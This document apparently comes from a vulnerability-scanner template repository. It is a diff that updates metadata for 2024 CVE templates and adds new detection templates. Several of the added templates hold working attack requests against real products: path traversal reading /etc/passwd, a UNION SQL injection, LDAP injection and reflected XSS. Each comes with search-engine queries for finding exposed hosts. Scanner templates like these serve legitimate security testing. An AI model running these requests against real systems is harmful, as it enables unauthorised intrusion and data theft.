tags: cve,cve2024,wordpress,nextgen-gallery,wp-plugin,info-leak + tags: cve,cve2024,wordpress,nextgen-gallery,wp-plugin,info-leak,imagely http: - method: GET @@ -48,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d937a4e33ba274ac20f1c8201f9a5ec5053252381b066f6ca34efbb0357112c5022100c5aa25daa1dcadea9076b1bfd0c414c26fd500c71e46d3e56461e1ef6be67149:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204cf9cdd69982a8e227f0c764131f0bd599577b93aa5bd10b754c70d912602c36022043662719fb8ead44e0995b7428e6c96ea3079f74f0382eb42bc39d181c0b284a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-3136.yaml b/http/cves/2024/CVE-2024-3136.yaml index 1239487900..d77f57b538 100644 --- a/http/cves/2024/CVE-2024-3136.yaml +++ b/http/cves/2024/CVE-2024-3136.yaml @@ -19,14 +19,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-3136 - epss-score: 0.00045 - epss-percentile: 0.14274 + epss-score: 0.00065 + epss-percentile: 0.28259 metadata: - publicwww-query: "/wp-content/plugins/masterstudy-lms-learning-management-system" verified: true max-request: 2 + publicwww-query: "/wp-content/plugins/masterstudy-lms-learning-management-system" tags: cve,cve2024,wp,wordpress,unauth,lfi - variables: randomstr: "{{randstr_1}}" marker: "{{base64(randomstr)}}" @@ -60,4 +59,4 @@ http: group: 1 internal: true name: nonce -# digest: 4a0a0047304502206e33a2d814c15125c07d788ddd3fa86d8d8c00963ff4ee67ee6978b537395c2e022100c3dbee7b576104e81ce534ed2e9bcce2296b7a6ffeca66acde35e5d081bb93d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202b763dd72807cc252360a0934574e10db71e534d2dcb99664ef0d64f8e8a248002210097d5a1eaeb56e1c3c6b1f836e5c15a210596a30c9af148de0c5ee5b15b9e927f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-31621.yaml b/http/cves/2024/CVE-2024-31621.yaml index 6adada63e3..ed5e15f914 100644 --- a/http/cves/2024/CVE-2024-31621.yaml +++ b/http/cves/2024/CVE-2024-31621.yaml @@ -10,6 +10,9 @@ info: - https://www.exploit-db.com/exploits/52001 - https://github.com/FlowiseAI/Flowise/releases - https://flowiseai.com/ + classification: + epss-score: 0.00381 + epss-percentile: 0.72907 metadata: verified: true max-request: 1 @@ -33,4 +36,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d9304152d30fa5644b18033462ab1ed52f23ce5c4a695a6a8aebb824ca3ea457022100e6b1c27bfc23808cc83a3cad56e4e7796d3483c7fb35c8253aaddad5a1aac110:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100855b41a796131b8698eb12f78f117662e6af38aa8fcb1b42a37c4632b6c435900220650b6ae50a13b556b12b96269eb1d8e840cb3d4cc47a5667bcbc6e030cf4ff56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-31848.yaml b/http/cves/2024/CVE-2024-31848.yaml index f7a29f8442..34f2fed234 100644 --- a/http/cves/2024/CVE-2024-31848.yaml +++ b/http/cves/2024/CVE-2024-31848.yaml @@ -11,19 +11,19 @@ info: - https://github.com/Stuub/CVE-2024-31848-PoC/blob/main/CVE-2024-31848.py - https://www.tenable.com/cve/CVE-2024-31848 - https://www.tenable.com/security/research/tra-2024-09 + - https://github.com/Stuub/CVE-2024-31848-PoC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-31848 cwe-id: CWE-22 - epss-score: 0.00044 - epss-percentile: 0.09773 + epss-score: 0.00054 + epss-percentile: 0.21518 metadata: verified: true - max-request: 1 - shodan-query: title:"CData - API Server" + max-request: 2 + shodan-query: "title:\"CData - API Server\"" tags: cve,cve2024,cdata,lfi - flow: http(1) && http(2) http: @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207716de1b37106fd74b61c49cce61a5d2f0c123e701fc9e66b91a52b18a37ea2a02200cd509769de5850cafe5c0d9c721ec1c13740712ac9e7a26abe2917eddf7b9e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202bba0b10fd785f68ccd28a5a844100e8774efb025416d9d1bc2ea8a8b8937d36022021998db80800ce9ef7ecaf3a5b1807731fb4531b4d0e6ed59f7a398324d6cf8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-31849.yaml b/http/cves/2024/CVE-2024-31849.yaml index 5d341c440a..f5d822ffce 100644 --- a/http/cves/2024/CVE-2024-31849.yaml +++ b/http/cves/2024/CVE-2024-31849.yaml @@ -10,19 +10,20 @@ info: - https://www.tenable.com/security/research/tra-2024-09 - https://www.cdata.com/kb/entries/jetty-cve-0324.rst - https://nvd.nist.gov/vuln/detail/CVE-2024-31849 + - https://github.com/Ostorlab/KEV + - https://github.com/Stuub/CVE-2024-31848-PoC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-31849 cwe-id: CWE-22 - epss-score: 0.00044 - epss-percentile: 0.09652 + epss-score: 0.00053 + epss-percentile: 0.21091 metadata: verified: true - max-request: 1 - shodan-query: title:"CData Connect" + max-request: 2 + shodan-query: "title:\"CData Connect\"" tags: cve,cve2024,cdata,lfi - flow: http(1) && http(2) http: @@ -60,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206306def4e2e9bd849a9223859d49dc3876b05ac689c4018361bce890427600d7022100f74718e6db0689ac6ce5206fc0b57545354477d87c84d0b8c6d3a3ff7524fdce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c377b55013c499dc07d8fb55d4358d50ac1592dd053759aa2583a3e6ad9aba85022054b63bed022c6de67a1b2dd3684efd8c746747afe322a61d2928c1a92fc358fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-31850.yaml b/http/cves/2024/CVE-2024-31850.yaml index dee808c0be..9517843e15 100644 --- a/http/cves/2024/CVE-2024-31850.yaml +++ b/http/cves/2024/CVE-2024-31850.yaml @@ -9,19 +9,19 @@ info: reference: - https://www.tenable.com/security/research/tra-2024-09 - https://nvd.nist.gov/vuln/detail/CVE-2024-31850 + - https://github.com/Stuub/CVE-2024-31848-PoC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L cvss-score: 8.6 cve-id: CVE-2024-31850 cwe-id: CWE-22 - epss-score: 0.00044 - epss-percentile: 0.09773 + epss-score: 0.00053 + epss-percentile: 0.21091 metadata: verified: true - max-request: 1 - shodan-query: title:"CData Arc" + max-request: 2 + shodan-query: "title:\"CData Arc\"" tags: cve,cve2024,cdata,lfi - flow: http(1) && http(2) http: @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a90aacad9d50c7b4f889f1ea7226b29388df438d5644c28822dc4a2715f9490502200ea6c2b15395f98c3499bf87ddb3dea4f98de351105b8418254967fc47e7c3aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008bbf300b0ea549282dc1258f3c481521e094057630ded471600235926cfb8aad022043e0add2cc98eeefeaed68b619c6ec62bd46e6d640ae65e66f49a5431c5fde93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-31851.yaml b/http/cves/2024/CVE-2024-31851.yaml index e057749cbf..753f621b07 100644 --- a/http/cves/2024/CVE-2024-31851.yaml +++ b/http/cves/2024/CVE-2024-31851.yaml @@ -14,14 +14,13 @@ info: cvss-score: 8.6 cve-id: CVE-2024-31851 cwe-id: CWE-22 - epss-score: 0.00044 - epss-percentile: 0.09773 + epss-score: 0.00054 + epss-percentile: 0.21518 metadata: verified: true - max-request: 1 - shodan-query: title:"CData Sync" + max-request: 2 + shodan-query: "title:\"CData Sync\"" tags: cve,cve2024,cdata,lfi - flow: http(1) && http(2) http: @@ -59,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100842e24cc880d77226e1303cecc992eba04ec11f26e0a04b9dda1a8e79668d748022100bf52bffb2d81f6061330180b33406e553b52f778bc07ebb4365d98c249849ae6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210090d4d9de6346bbb09774928cf9feff8c35a86741a0bc5b6e125cb7202cff980502204c5052b55e340d12b6ef19bdb5e3bbd27f725bb837e394805e12ddb092fbc272:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-32399.yaml b/http/cves/2024/CVE-2024-32399.yaml index bdfa872f02..403d19dac2 100644 --- a/http/cves/2024/CVE-2024-32399.yaml +++ b/http/cves/2024/CVE-2024-32399.yaml @@ -13,8 +13,8 @@ info: - https://github.com/NN0b0dy/CVE-2024-32399 - https://github.com/nomi-sec/PoC-in-GitHub classification: - epss-score: 0.00043 - epss-percentile: 0.08167 + epss-score: 0.00053 + epss-percentile: 0.21091 metadata: verified: true max-request: 1 @@ -33,4 +33,4 @@ http: - 'contains(header, "application/octet-stream")' - 'status_code == 200' condition: and -# digest: 4b0a00483046022100c68ae449c313523a338ad0b181aaa41e15eda98a9b200d3ed208a44ae24127a6022100e2c5a881638a9019355b8922941feb90086ba1dfe4d8175bfd566c3122caf772:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a4e4fec406f9745a3ec5ab8ef88a44a13b351b1b3c8a4148416cf83776e7632c022100a63559fdc8153e058c817e01043c453e8af311de120d56c15030608f4b5c5598:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-32640.yaml b/http/cves/2024/CVE-2024-32640.yaml index 3a719ded91..886747665b 100644 --- a/http/cves/2024/CVE-2024-32640.yaml +++ b/http/cves/2024/CVE-2024-32640.yaml @@ -18,7 +18,9 @@ info: max-request: 1 vendor: masacms product: masacms - shodan-query: 'Generator: Masa CMS' + shodan-query: + - 'Generator: Masa CMS' + - "generator: masa cms" tags: cve,cve2024,sqli,cms,masa,masacms http: @@ -38,4 +40,4 @@ http: - 'contains_all(body, "Unhandled Exception")' - 'contains_all(header,"cfid","cftoken")' condition: and -# digest: 490a0046304402205137d62a1a156eb05abb3b8cf2e25cf11515c4d7e2f7e0180a2178ad123af0d1022076a749c27251a5412b13e303a6a6724eb2c1d40dbfe236975cd2f0f1050201dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206eccd0783b81a569061e6e996a33b917a1eca34bb2e26b04e47993cf4137690f02203413cd6642c7e01f2dbd3b6bf10fba063c483073a1da5349b56a666d945f008e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-32651.yaml b/http/cves/2024/CVE-2024-32651.yaml index 1a2deb2d94..c59456c1c0 100644 --- a/http/cves/2024/CVE-2024-32651.yaml +++ b/http/cves/2024/CVE-2024-32651.yaml @@ -16,8 +16,8 @@ info: cvss-score: 10 cve-id: CVE-2024-32651 cwe-id: CWE-1336 - epss-score: 0.00045 - epss-percentile: 0.14322 + epss-score: 0.00065 + epss-percentile: 0.28259 metadata: verified: true max-request: 1 @@ -54,4 +54,4 @@ http: - type: dsl dsl: - compare_versions(version, '<= 0.45.20') -# digest: 490a004630440220166f3ac3c6c4657641c4499aa0d8cd1096190ee1a19bb4497770c30fac5558da0220174976fb80906ac6496cdb1e657106b3c93cdde5f8980ed3ab7c0bcf2de63113:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fababded42d7a17ed446608da54c1802c86f5ad0eff6a4f9f9c6299a3d4e0f9e022100843a8f54563f6dd62aa6d9d160e9ad7f886f39d623887bca9819f2e2fbb93ce4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-3273.yaml b/http/cves/2024/CVE-2024-3273.yaml index eb7b78365f..5af765fb8b 100644 --- a/http/cves/2024/CVE-2024-3273.yaml +++ b/http/cves/2024/CVE-2024-3273.yaml @@ -2,7 +2,7 @@ id: CVE-2024-3273 info: name: D-Link Network Attached Storage - Command Injection and Backdoor Account author: pussycat0x - severity: high + severity: critical description: | UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced. reference: @@ -12,17 +12,20 @@ info: - https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10383 - https://vuldb.com/?ctiid.259284 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L - cvss-score: 7.3 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2024-3273 cwe-id: CWE-77 - epss-score: 0.00044 - epss-percentile: 0.09057 + cpe: cpe:2.3:o:dlink:dns-320l_firmware:-:*:*:*:*:*:*:* + epss-score: 0.83361 + epss-percentile: 0.98438 metadata: verified: true - fofa-query: app="D_Link-DNS-ShareCenter" + vendor: dlink + product: "dns-320l_firmware" + fofa-query: "app=\"D_Link-DNS-ShareCenter\"" + max-request: 1 tags: cve,cve2024,dlink,nas,kev - variables: cmd: "id" @@ -45,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f7987354e025dbc03f2e1afa23c2973af3ef684babd4e5fd110f4a90f06083ab022100fb410f784e3b4a10502077ab8b122e04039b29dea9df90707725691983bfe80d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203982bd27134560aeb8fa52d09e98ad42fbbbcaf319d257593aed74bef082be5a02202be13f559cdcb1d20876067e3f5b91f3264f7c62311e31c8907fbeac7990117e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-33575.yaml b/http/cves/2024/CVE-2024-33575.yaml index df83db4763..b5a553eda2 100644 --- a/http/cves/2024/CVE-2024-33575.yaml +++ b/http/cves/2024/CVE-2024-33575.yaml @@ -16,14 +16,17 @@ info: cvss-score: 5.3 cve-id: CVE-2024-33575 cwe-id: CWE-200 - epss-score: 0.00043 - epss-percentile: 0.08268 + epss-score: 0.00053 + epss-percentile: 0.21091 metadata: - vendor: User Meta - product: User Meta + max-request: 1 + vendor: "User Meta" + product: "User Meta" framework: wordpress + shodan-query: "http.html:/wp-content/plugins/user-meta/" + fofa-query: "body=/wp-content/plugins/user-meta/" publicwww-query: "/wp-content/plugins/user-meta/" - tags: wpscan,cve,cve2024,user-meta,wordpress,wp-plugin,info-leak + tags: wpscan,cve,cve2024,user-meta,wordpress,wp-plugin,info-leak,User Meta http: - method: GET @@ -36,4 +39,4 @@ http: - 'status_code == 200' - 'contains(body, "um-debug<br/>")' condition: and -# digest: 4a0a0047304502200273cf6345bda7ae0f53bba3ecd04ff070ee62c82b146898fc2a612f9363f6d602210087a74005c7a282fc34b4d12bdbe7fe68c141019e1ab85581d000d319aeff2fd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a78c33e192853e8fcda0de18684d06e49ae77793a8e3ceea2344f78a9aa7137302203845d1d0be3f8a221e28560b7f7156739ffa43d6db8b4bd532cd3c798f94e5b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-33724.yaml b/http/cves/2024/CVE-2024-33724.yaml index 65df9f2f55..ed32e9105c 100644 --- a/http/cves/2024/CVE-2024-33724.yaml +++ b/http/cves/2024/CVE-2024-33724.yaml @@ -14,7 +14,10 @@ info: max-request: 2 vendor: soplanning product: soplanning - shodan-query: html:"soplanning" + shodan-query: + - html:"soplanning" + - http.html:"soplanning" + fofa-query: body="soplanning" tags: packetstorm,cve,cve2024,authenticated,soplanning,xss http: @@ -46,4 +49,4 @@ http: - 'status_code_2 == 200' - 'contains_all(body_2, "<script>alert(document.domain)</script>", "SOPlanning")' condition: and -# digest: 4a0a00473045022100b2ba794854d39f477eba7ecc4a2ef4a49c3994da43c6768fa8b7833d9ff576a8022036b5166302b1717b96a5fbae6062df8b924ee738794571eae1eb2fe2aa69dc55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f171f03365c6716cd5b33b6e633c89d3e53a1d7ab8d4b398024e89aac6c1bb0e02210099d5fc6859262fe72c402f09f033747008b8fd3198c534a24aa197c1ce0c4d53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-3400.yaml b/http/cves/2024/CVE-2024-3400.yaml index 9aa9ce94e7..a9d651ea8b 100644 --- a/http/cves/2024/CVE-2024-3400.yaml +++ b/http/cves/2024/CVE-2024-3400.yaml @@ -10,22 +10,27 @@ info: - https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-CVE-2024-3400/ - https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis - https://nvd.nist.gov/vuln/detail/CVE-2024-3400 + - https://github.com/zam89/CVE-2024-3400-pot + - https://github.com/ZephrFish/CVE-2024-3400-Canary classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2024-3400 - cwe-id: CWE-77 - epss-score: 0.00371 - epss-percentile: 0.72356 - cpe: cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:*:*:*:*:*:*:* + cwe-id: CWE-20,CWE-77 + epss-score: 0.95703 + epss-percentile: 0.99417 + cpe: cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:-:*:*:*:*:*:* metadata: verified: true - max-request: 1 - fofa-query: icon_hash="-631559155" - shodan-query: http.favicon.hash:-631559155 - product: pan-os + max-request: 3 vendor: paloaltonetworks - tags: cve,cve2024,globalprotect,pan-os,rce,oast,kev + product: "pan-os" + shodan-query: + - "http.favicon.hash:-631559155" + - http.favicon.hash:"-631559155" + - cpe:"cpe:2.3:o:paloaltonetworks:pan-os" + fofa-query: "icon_hash=\"-631559155\"" + tags: cve,cve2024,globalprotect,pan-os,rce,oast,kev,intrusive,paloaltonetworks http: - raw: @@ -52,4 +57,4 @@ http: - status_code_1 == 404 && status_code_3 == 403 - contains(body_2, 'invalid required input parameters') condition: and -# digest: 4a0a00473045022100a1480b0b832bef7655fb52c49ae84122e9cabdf34c766e029002770e55073ba302200f1affd9a0d6cae40b943d774c8aee1af443981c4240f9ed87422a732fd69130:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aea1f0b3bf8fcbf9b028775de7eee9c1f158aad09cea1518a4ac483b00268ffd02205db7564fb596e8ada469884d750e9125102b47ee3826d62a03e40fbd09bf9ea2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-34470.yaml b/http/cves/2024/CVE-2024-34470.yaml new file mode 100644 index 0000000000..72f5fc1a86 --- /dev/null +++ b/http/cves/2024/CVE-2024-34470.yaml @@ -0,0 +1,54 @@ +id: CVE-2024-34470 + +info: + name: HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion + author: topscoder + severity: high + description: | + An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server. + reference: + - https://github.com/osvaldotenorio/CVE-2024-34470 + - https://github.com/nomi-sec/PoC-in-GitHub + - https://github.com/fkie-cad/nvd-json-data-feeds + - https://nvd.nist.gov/vuln/detail/CVE-2024-34470 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 + epss-score: 0.00043 + epss-percentile: 0.0866 + metadata: + verified: true + max-request: 2 + fofa-query: "mailinspector/public" + tags: cve,cve2024,lfi,mailinspector,hsc + +flow: http(1) && http(2) + +http: + - method: GET + path: + - "{{BaseURL}}/mailinspector/login.php" + + host-redirects: true + matchers: + - type: word + part: body + words: + - "Licensed to HSC TREINAMENTO" + + - method: GET + path: + - "{{BaseURL}}/mailinspector/public/loader.php?path=../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 +# digest: 4a0a00473045022051184fed9b9a4b1966d32d775675ae1770f24224d547667500500ad3177f5476022100fc9e3a62f08e8debfd9a15e004208573ed4273bfd4d6f2d48e09f8a46bcff1ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-3495.yaml b/http/cves/2024/CVE-2024-3495.yaml new file mode 100644 index 0000000000..a3fa7388ff --- /dev/null +++ b/http/cves/2024/CVE-2024-3495.yaml @@ -0,0 +1,57 @@ +id: CVE-2024-3495 + +info: + name: Wordpress Country State City Dropdown <=2.7.2 - SQL Injection + author: apple + severity: critical + description: | + The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the ‘cnt’ and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://sploitus.com/exploit?id=EDF4B3F8-DDF4-5196-A375-EC81B8BC18F1&utm_source=rss&utm_medium=rss + - https://github.com/truonghuuphuc/CVE-2024-3495-Poc + - https://nvd.nist.gov/vuln/detail/CVE-2024-3495 + - https://plugins.trac.wordpress.org/browser/country-state-city-auto-dropdown/trunk/includes/ajax-actions.php#L22 + - https://plugins.trac.wordpress.org/browser/country-state-city-auto-dropdown/trunk/includes/ajax-actions.php#L8 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-3495 + cwe-id: CWE-89 + epss-score: 0.00065 + epss-percentile: 0.28393 + metadata: + verified: true + max-request: 2 + publicwww-query: "/wp-content/plugins/country-state-city-auto-dropdown" + tags: cve,cve2024,wp,wp-plugin,wordpress,sqli + +variables: + num: "999999999" + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=tc_csca_get_cities&nonce_ajax={{nonce}}&sid=1+or+0+union+select+concat(0x64617461626173653a,(select%20md5({{num}})),0x7c76657273696f6e3a,(select%20md5({{num}})),0x7c757365723a,user()),2,3--+- + + matchers: + - type: word + part: body_2 + words: + - '{{md5(num)}}' + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - '"nonce":"(\S*)"' + internal: true +# digest: 4a0a00473045022059c57bd6c82e74ce84c99c339ccc1b107f2cb6aec5fa053b73b7f1aaa77003ac022100d3b0c3a42c10b8421de519da2237f3784bfd8b8a8d01f55fc6b08c58c59860c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-37393.yaml b/http/cves/2024/CVE-2024-37393.yaml new file mode 100644 index 0000000000..4132913e7c --- /dev/null +++ b/http/cves/2024/CVE-2024-37393.yaml @@ -0,0 +1,51 @@ +id: CVE-2024-37393 +info: + name: SecurEnvoy Two Factor Authentication - LDAP Injection + author: securityforeveryone + severity: critical + description: | + Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature. + reference: + - https://www.tenable.com/cve/CVE-2024-37393 + - https://www.optistream.io/blogs/tech/securenvoy-cve-2024-37393 + - https://securenvoy.com + metadata: + verified: true + shodan-query: title:"SecurEnvoy" + fofa-query: title="SecurEnvoy" + tags: cve,cve2024,securenvoy,ldap + +variables: + userid: "{{to_lower(rand_base(20))}}" + +http: + - raw: + - | + POST /secserver/? HTTP/2 + Host: {{Hostname}} + + FLAG=DESKTOP + 1 + STATUS:INIT + USERID:{{userid}})(sAMAccountName=* + MEMBEROF:Domain Users + + - | + POST /secserver/? HTTP/2 + Host: {{Hostname}} + + FLAG=DESKTOP + 1 + STATUS:INIT + USERID:*)(sAMAccountName=* + MEMBEROF:Domain Users + + matchers: + - type: dsl + dsl: + - "contains(body_1, 'Error checking Group')" + - "status_code_1 == 200" + - "contains(body_2, 'GETPASSCODE')" + - "status_code_2 == 200" + condition: and +# digest: 490a0046304402207956ded5a27d1c12f6487316e5b14bb02bb6977fa43bc048e1a21ac9010125480220063cb9fbb223d773537cc685ba85640b97d10412c97695ac541f5ecbac760bbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-3822.yaml b/http/cves/2024/CVE-2024-3822.yaml new file mode 100644 index 0000000000..b59749affd --- /dev/null +++ b/http/cves/2024/CVE-2024-3822.yaml @@ -0,0 +1,38 @@ +id: CVE-2024-3822 + +info: + name: Base64 Encoder/Decoder <= 0.9.2 - Cross-Site Scripting + author: omranisecurity + severity: medium + description: | + The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. + reference: | + - https://wpscan.com/vulnerability/ff5411b1-9e04-4e72-a502-e431d774642a/ + - https://nvd.nist.gov/vuln/detail/CVE-2024-3822 + - https://wpscan.com/vulnerability/ff5411b1-9e04-4e72-a502-e431d774642a/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cve-id: CVE-2024-3822 + cwe-id: CWE-79 + epss-score: 0.00043 + epss-percentile: 0.0866 + metadata: + verified: true + max-request: 1 + fofa-query: "wp-content/plugins/base64-encoderdecoder/" + tags: cve,cve2024,wordpress,wp-plugin,wp,xss,base64-encoderdecoder + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/base64-encoderdecoder/base64-decode.php?string=PHNjcmlwdD5hbGVydCgiZG9jdW1lbnQuZG9tYWluIik8L3NjcmlwdD4=" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(header, "text/html")' + - 'contains(body, "<p><script>alert(\"document.domain\")</script></p>")' + condition: and +# digest: 4a0a00473045022100d2868a59e3c34566b08f8ff3f5b24fc9f7f7ecea4d923f906a1883ce70911da902205775a0c8bed2a2337a63d20c67755f6389a31b1023ba8be4c58056e10107894a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-4040.yaml b/http/cves/2024/CVE-2024-4040.yaml index 3830add6ba..4820b4f970 100644 --- a/http/cves/2024/CVE-2024-4040.yaml +++ b/http/cves/2024/CVE-2024-4040.yaml @@ -25,12 +25,14 @@ info: cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:* metadata: verified: true - max-request: 2 + max-request: 5 vendor: crushftp product: crushftp - shodan-query: html:"CrushFTP" + shodan-query: + - "html:\"CrushFTP\"" + - http.html:"crushftp" + fofa-query: "body=\"crushftp\"" tags: cve,cve2024,lfr,crushftp,vfs,kev - flow: | if ( !template.hasOwnProperty('username') || !template.hasOwnProperty('password') ) { // if username or password is not provided, run unauthenticated exploit @@ -122,4 +124,4 @@ http: part: body words: - "root:x:" -# digest: 490a00463044022034365345ca960cac174d54cf353f25ea720b065bf9bd3d8e354696368908c0b702203f998746363311340e85f3d692227a4c849f84ebe03837ea3004486821b6e19c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205948e827bf5269dd832ea8fc33d44f6117231bf9ad76ba8e2cb63850d4e41fb8022100dc3dd1a4a7e74dc17bfa8f30e8cf13605fbbc7bf05806d9aca6243bf03db95ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-4348.yaml b/http/cves/2024/CVE-2024-4348.yaml index 58c0113dd0..04504f7d8b 100644 --- a/http/cves/2024/CVE-2024-4348.yaml +++ b/http/cves/2024/CVE-2024-4348.yaml @@ -9,16 +9,21 @@ info: reference: - https://packetstormsecurity.com/files/178375/osCommerce-4-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2024-4348 + - https://vuldb.com/?ctiid.262488 + - https://vuldb.com/?id.262488 + - https://vuldb.com/?submit.320855 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N cvss-score: 4.3 cve-id: CVE-2024-4348 cwe-id: CWE-79 + epss-score: 0.00065 + epss-percentile: 0.28259 metadata: verified: true max-request: 2 shodan-query: html:"osCommerce" - tags: packetstorm,xss,rxss,oscommerce + tags: packetstorm,xss,rxss,oscommerce,cve2024,cve http: - method: GET @@ -44,4 +49,4 @@ 